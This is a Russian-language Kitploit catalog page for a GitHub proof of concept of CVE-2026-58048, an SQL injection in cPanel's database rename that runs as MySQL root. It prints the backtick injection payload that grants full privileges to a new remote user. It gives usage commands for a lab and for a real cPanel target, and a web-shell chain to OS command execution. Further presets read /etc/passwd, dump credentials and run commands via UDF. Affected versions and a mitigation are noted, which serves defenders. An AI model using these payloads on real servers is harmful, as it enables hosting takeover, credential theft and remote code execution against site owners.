Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
POC-CVE-2026-58048 — Проект по исследованию безопасности | Kitploit
Инструменты/GitHubGitHub/imbas007/poc-cve-2026-58048
Повышение привилегийЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеБезопасность Баз ДанныхЛаборатории и Практика
GitHubimbas007/poc-cve-2026-58048

POC-CVE-2026-58048

Проект по исследованию безопасности

Репозиторий
161 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-58048

CVSS 4.0: 9.4 (Critical) | CWE-89: SQL Injection | NVD

Аутентифицированный пользователь cPanel → произвольный SQL от имени MySQL root через переименование базы данных. cPanel некорректно сохраняет sql_mode сессии пользователя (ANSI_QUOTES) при выполнении операций переименования от имени root — обратный апостроф в имени базы данных вырывается за пределы идентификатора и внедряет SQL.

root@kitploit:~
name: db`; GRANT ALL ON *.* TO 'rce'@'%' IDENTIFIED BY 'pwned!'; -- 

Быстрый старт (Docker-лаборатория)

root@kitploit:~
pip install -r requirements.txt

python3 simulate.py start   # start lab (MariaDB:13306, cPanel API:18080, Apache:18081)
python3 poc.py -t http://localhost:18080 --mysql-port 13306 --payload admin-user --verify
python3 simulate.py stop

Лабораторный режим определяется автоматически — флаг --lab не требуется.

Реальная цель cPanel

root@kitploit:~
python3 poc.py -t https://cpanel.example.com:2083 -u user -p 'pass' \
    --payload admin-user --verify

Пресеты Payload

Произвольный SQL: --inject "GRANT ALL ON *.* TO 'x'@'%' IDENTIFIED BY 'y'"

Полная цепочка RCE (лаборатория)

root@kitploit:~
# 1. Write shell to web root
python3 poc.py -t http://localhost:18080 --mysql-port 13306 \
    --payload webshell --shell /var/www/html/shell.php

# 2. Execute commands via HTTP!
curl "http://localhost:18081/shell.php?0=id"

Затронутые версии

cPanel < 11.110.0.137, 11.118.0.71, 11.126.0.78, 11.134.0.48, 11.136.0.32; WP Squared < 11.138.1.6

Меры по смягчению: обновите cPanel или отзовите у пользователей функцию MySQL.

Ссылки

  • Уведомление cPanel
  • SecurityOnline

Только для авторизованного тестирования безопасности и обучения.

Скачать инструмент
ПресетЭффект
admin-user (по умолчанию)Создать MySQL-администратора rce
compact-adminКороткий admin payload (<64 символов — укладывается в лимит имени реального cPanel; проверка: r/p)
webshellЗаписать PHP-shell через INTO OUTFILE (--shell /var/www/html/shell.php)
read-fileПрочитать файл сервера через LOAD_FILE (--file /etc/passwd)
dump-usersСделать дамп всех учётных данных MySQL в pwn.users
udf-rceВыполнение команд ОС через UDF